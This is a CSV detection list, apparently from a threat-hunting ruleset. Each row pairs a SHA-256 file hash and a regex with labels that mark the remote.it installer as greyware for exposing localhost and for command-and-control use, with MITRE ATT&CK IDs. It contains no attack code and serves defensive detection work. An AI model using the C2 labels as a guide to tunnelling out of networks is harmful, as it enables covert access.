"*00caf6dfcf353f66ed5c3937d8d12fcef79c27a845fea644c75ff9f3bfd27eec*",".{0,1000}00caf6dfcf353f66ed5c3937d8d12fcef79c27a845fea644c75ff9f3bfd27eec.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*013166fb62f933f2af2d9c1cc8207b66cb8e693814cdaa6d242e221be0a2fff2*",".{0,1000}013166fb62f933f2af2d9c1cc8207b66cb8e693814cdaa6d242e221be0a2fff2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*0149c7275232b058c1da45542ec522561c8895a65ec6bc1422ee3c07a1276110*",".{0,1000}0149c7275232b058c1da45542ec522561c8895a65ec6bc1422ee3c07a1276110.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*03b738de271f354a0aa9c1773c4561b736fc03991008778a50a352a54bfa111b*",".{0,1000}03b738de271f354a0aa9c1773c4561b736fc03991008778a50a352a54bfa111b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*04972d8a2dab86aca68eed06eaec968025915df802e31c0f4db8e8baad010a2b*",".{0,1000}04972d8a2dab86aca68eed06eaec968025915df802e31c0f4db8e8baad010a2b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*05852ffa6c718d4d63489c966ba8dcc8109de75c7390a6ef5fc1c8f1644a7ab1*",".{0,1000}05852ffa6c718d4d63489c966ba8dcc8109de75c7390a6ef5fc1c8f1644a7ab1.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*058711652c885c5765e5bcc0b693c6861d3bcca0305474cc9da635a04898c954*",".{0,1000}058711652c885c5765e5bcc0b693c6861d3bcca0305474cc9da635a04898c954.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*0703f542c4dd1cdde9535cc7552b3bdb2a862904690d7e27f8c61a19f84fc4f1*",".{0,1000}0703f542c4dd1cdde9535cc7552b3bdb2a862904690d7e27f8c61a19f84fc4f1.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*07c29c4df1a2616348871ffd8ca04f3774243980bec8e37f093fe8c0b56cff9e*",".{0,1000}07c29c4df1a2616348871ffd8ca04f3774243980bec8e37f093fe8c0b56cff9e.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*07cc0dbf5aedfcbba76d61e72e346b2631868e6bd200efdbec214d85a75417f5*",".{0,1000}07cc0dbf5aedfcbba76d61e72e346b2631868e6bd200efdbec214d85a75417f5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*07f70bf5e1e41d3ad989824ccd3eb652dd4f30d151aab605c01a05b9db74a2df*",".{0,1000}07f70bf5e1e41d3ad989824ccd3eb652dd4f30d151aab605c01a05b9db74a2df.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*0a348d00ff8925287a5fb696c5dd5e4f66c4d8fad6f2a19597acd9dc856f15c5*",".{0,1000}0a348d00ff8925287a5fb696c5dd5e4f66c4d8fad6f2a19597acd9dc856f15c5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*0a6890a6e321fa795e960c77d09bebf620dba250274fb16fa59f1694cb2109bf*",".{0,1000}0a6890a6e321fa795e960c77d09bebf620dba250274fb16fa59f1694cb2109bf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*0b6e3bb9babf35f1580de0b32ba27a13e5187dfd5a66c6694e2e4713c49c0532*",".{0,1000}0b6e3bb9babf35f1580de0b32ba27a13e5187dfd5a66c6694e2e4713c49c0532.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*0b8c64aa6263b5ad20087692b6f1d2ae26875a1f3015aa7c8bb1f401baa59ec7*",".{0,1000}0b8c64aa6263b5ad20087692b6f1d2ae26875a1f3015aa7c8bb1f401baa59ec7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*0c197d94ca78db1fa029238f944f822c1b90b6f976c569cfd31eb438b16acba2*",".{0,1000}0c197d94ca78db1fa029238f944f822c1b90b6f976c569cfd31eb438b16acba2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*0d7bafd96f7400a85372e15cfbb0e3d190701604903734e9546635720bbb56be*",".{0,1000}0d7bafd96f7400a85372e15cfbb0e3d190701604903734e9546635720bbb56be.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*0dc1e16be2a13ae30176a34a2b31a93c3bfd49d1382477f096e3a91ba98826ba*",".{0,1000}0dc1e16be2a13ae30176a34a2b31a93c3bfd49d1382477f096e3a91ba98826ba.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*0ed16e6b3d19d4e2c709a9fe09445939bc184499c020eebc07eee27becffb6d9*",".{0,1000}0ed16e6b3d19d4e2c709a9fe09445939bc184499c020eebc07eee27becffb6d9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*0f191947663cea1863ae366c895dead2e7a769acfd60bc22121a1d4866b821f9*",".{0,1000}0f191947663cea1863ae366c895dead2e7a769acfd60bc22121a1d4866b821f9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*0fbabd9468d07f89402193268bb3c1bfcc9c216f389e66cbc6eb75f3ef2a6dd9*",".{0,1000}0fbabd9468d07f89402193268bb3c1bfcc9c216f389e66cbc6eb75f3ef2a6dd9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1130109b30396301e05aba1303f6c5d27d6e35e033905469f45fb1102cab5c4f*",".{0,1000}1130109b30396301e05aba1303f6c5d27d6e35e033905469f45fb1102cab5c4f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*11a7c6e09cebb1a12cf18f43562ead367a7f527fbdea3a075422e48ecabd9e31*",".{0,1000}11a7c6e09cebb1a12cf18f43562ead367a7f527fbdea3a075422e48ecabd9e31.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*120fdd11d2b0a7c94663024af9b13e8c0b557f9c0e1efbc1cb85fa2122552c7c*",".{0,1000}120fdd11d2b0a7c94663024af9b13e8c0b557f9c0e1efbc1cb85fa2122552c7c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*125344e96627208ed84121e1d5244eb4f4b58b6606a51aa0c39282866da8cf5d*",".{0,1000}125344e96627208ed84121e1d5244eb4f4b58b6606a51aa0c39282866da8cf5d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1306f44ac242dd1382032f05a8f2ebf813cb71e0d8224e56455fbdb8cee02d81*",".{0,1000}1306f44ac242dd1382032f05a8f2ebf813cb71e0d8224e56455fbdb8cee02d81.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1320fcd96e4908f3c2ee0e86b30b5c6da22a755a29c3dd4392027b00e4ef66c7*",".{0,1000}1320fcd96e4908f3c2ee0e86b30b5c6da22a755a29c3dd4392027b00e4ef66c7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1359a52268613c5ffa6bef0a7030aad1cf409dba348b6b4fa3ab8d9a97d275ac*",".{0,1000}1359a52268613c5ffa6bef0a7030aad1cf409dba348b6b4fa3ab8d9a97d275ac.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*138277b4b2fb7da83f007207bec5df288dbc57ebff80d99c4a2d57eccc950bb9*",".{0,1000}138277b4b2fb7da83f007207bec5df288dbc57ebff80d99c4a2d57eccc950bb9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1385144a41372d190eaf788b27372cc2bb258776722138c8ab3f1936e3bf051b*",".{0,1000}1385144a41372d190eaf788b27372cc2bb258776722138c8ab3f1936e3bf051b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*14b0160138b97e9183e570c542a566bcb68d815dc92761a9d31679a51626433f*",".{0,1000}14b0160138b97e9183e570c542a566bcb68d815dc92761a9d31679a51626433f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1643e037fc61ff8a14184176044145d17ce1ef2bbf9fc7c2e0d1679853d9ec74*",".{0,1000}1643e037fc61ff8a14184176044145d17ce1ef2bbf9fc7c2e0d1679853d9ec74.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1797c1fffe28c7234cc822eccdc773487499bd62c19bd999095d5eb11aa18b58*",".{0,1000}1797c1fffe28c7234cc822eccdc773487499bd62c19bd999095d5eb11aa18b58.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*184bc09abc6f6936a05c6ee49fdba98c5a289373ae70afdba2daa758d630593b*",".{0,1000}184bc09abc6f6936a05c6ee49fdba98c5a289373ae70afdba2daa758d630593b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*18a056d9fa89813c9e19f150cfab07ab374681ae253f4f7ce9953d4cad79bd2c*",".{0,1000}18a056d9fa89813c9e19f150cfab07ab374681ae253f4f7ce9953d4cad79bd2c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1c3116773feaf7723c98e6ec8c57dffadb45ed4dd6781133befb612fe40d5e96*",".{0,1000}1c3116773feaf7723c98e6ec8c57dffadb45ed4dd6781133befb612fe40d5e96.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1c6329a23d57e7b38b7ae061f609c4efcc75144cde1061ef3bcd2d2264b42dd9*",".{0,1000}1c6329a23d57e7b38b7ae061f609c4efcc75144cde1061ef3bcd2d2264b42dd9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1de7b243066345a7d95e5e61837e54cf91b687f5e064419d11ce6b48534d9a66*",".{0,1000}1de7b243066345a7d95e5e61837e54cf91b687f5e064419d11ce6b48534d9a66.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1e4339c6d4ebe8badb742b42ff9a336c9cbf4fca5d735dfdea67b7a9c598a297*",".{0,1000}1e4339c6d4ebe8badb742b42ff9a336c9cbf4fca5d735dfdea67b7a9c598a297.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1ede16af1fa680690f056d759d16a26bf527bd18d75cdd2d88c830b2a4afd980*",".{0,1000}1ede16af1fa680690f056d759d16a26bf527bd18d75cdd2d88c830b2a4afd980.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*1f0ebec30ded3a9df5a8e2195bbc891c339a092c8ac0f07233c8478c1182242f*",".{0,1000}1f0ebec30ded3a9df5a8e2195bbc891c339a092c8ac0f07233c8478c1182242f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*204eefc73b55ea27b172fcedba0c3ee0615548663fd095839ba2e153c8664e76*",".{0,1000}204eefc73b55ea27b172fcedba0c3ee0615548663fd095839ba2e153c8664e76.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*205d67361d76c5f674393f0762515f32f005487d640751fb0cb67f81fa298ff4*",".{0,1000}205d67361d76c5f674393f0762515f32f005487d640751fb0cb67f81fa298ff4.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*206d0059cc04cdb49bff03b5d3658749b511257cc235b2944dc74b82a0b31a2f*",".{0,1000}206d0059cc04cdb49bff03b5d3658749b511257cc235b2944dc74b82a0b31a2f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*20e6ac956f7f2b27eff59e66b04765a87cfdc9c1b2e30c5411a4a93b070813af*",".{0,1000}20e6ac956f7f2b27eff59e66b04765a87cfdc9c1b2e30c5411a4a93b070813af.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*214f97a55b8eb353dca363203a6616eed9a47d5f7faf21ff77664df8f9a4523d*",".{0,1000}214f97a55b8eb353dca363203a6616eed9a47d5f7faf21ff77664df8f9a4523d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*21af6d82b768b2311a249442c6777766b23a8d2f237a1905bdcf5457dea65182*",".{0,1000}21af6d82b768b2311a249442c6777766b23a8d2f237a1905bdcf5457dea65182.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*222ba94a96c4cd53262600b7d14dce0a100e870e042836ce421fcf8b8b89e01a*",".{0,1000}222ba94a96c4cd53262600b7d14dce0a100e870e042836ce421fcf8b8b89e01a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*22ad7d6222dbeb747db8b41dedb9c96ffe566e86e7cd4d5570ea010904d7b7c6*",".{0,1000}22ad7d6222dbeb747db8b41dedb9c96ffe566e86e7cd4d5570ea010904d7b7c6.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*22cf3e75a11ac9d8b492e3c97ed730957372cca18f8d5e57f40d6357de006b35*",".{0,1000}22cf3e75a11ac9d8b492e3c97ed730957372cca18f8d5e57f40d6357de006b35.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*23fefd6e0803cb90fd71ab9011715c20916a5cddea1b07baac74a92e64106313*",".{0,1000}23fefd6e0803cb90fd71ab9011715c20916a5cddea1b07baac74a92e64106313.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*260e25a0cbe80d9ff05a9b1383bd0ac4f0d0fe0585c744ef1dc6c0e2dea45e06*",".{0,1000}260e25a0cbe80d9ff05a9b1383bd0ac4f0d0fe0585c744ef1dc6c0e2dea45e06.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*26cadd85587b74a8eaa26e6eae7724b60fc49b5ec448c41648168748404c4d13*",".{0,1000}26cadd85587b74a8eaa26e6eae7724b60fc49b5ec448c41648168748404c4d13.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*272873c13925ec870472484b99455d3e9dcbf82481b714a9fc05a7c1933137f2*",".{0,1000}272873c13925ec870472484b99455d3e9dcbf82481b714a9fc05a7c1933137f2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*2a349ec0870eaf921a1925be43539fb43de54a468bf0450965ce2170e8bc8afb*",".{0,1000}2a349ec0870eaf921a1925be43539fb43de54a468bf0450965ce2170e8bc8afb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*2bbe8dacf7d9ce6812dc88c629ef572ea7b7c507b240cfe299c2991a10fefbdf*",".{0,1000}2bbe8dacf7d9ce6812dc88c629ef572ea7b7c507b240cfe299c2991a10fefbdf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*3070edf334a7ecaf3259b124641526d1b9f56a4c67ff892e0948913cd57ffff2*",".{0,1000}3070edf334a7ecaf3259b124641526d1b9f56a4c67ff892e0948913cd57ffff2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*32aa4a7dcec317cef0a8e65e25a63c0c8e656745f72c49734ca7aedc8ec9a264*",".{0,1000}32aa4a7dcec317cef0a8e65e25a63c0c8e656745f72c49734ca7aedc8ec9a264.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*332436f5e6ee1c744ab5c658cc360e3d9f084e39ba583d8b2bcbf2e36f68a7fb*",".{0,1000}332436f5e6ee1c744ab5c658cc360e3d9f084e39ba583d8b2bcbf2e36f68a7fb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*34286d2404219856835c624def995c2c71413456d9a9e7b8cb5affe8597f7dec*",".{0,1000}34286d2404219856835c624def995c2c71413456d9a9e7b8cb5affe8597f7dec.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*3448383224c7ac46a72a5717633490909333d1a50a29dbfc4434ff90e16d6b33*",".{0,1000}3448383224c7ac46a72a5717633490909333d1a50a29dbfc4434ff90e16d6b33.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*356dd15f05b37e62f334000101f95094b81c0c473cba0e8c033bec5f9f2b84eb*",".{0,1000}356dd15f05b37e62f334000101f95094b81c0c473cba0e8c033bec5f9f2b84eb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*36e59507a58d54c025b62c0ef2699382e6ca9211062540ee263544bf54854768*",".{0,1000}36e59507a58d54c025b62c0ef2699382e6ca9211062540ee263544bf54854768.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*3a0743b046340770a16cdddacc4bfef4e2f07e0062669d07589f0d62af1a2702*",".{0,1000}3a0743b046340770a16cdddacc4bfef4e2f07e0062669d07589f0d62af1a2702.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
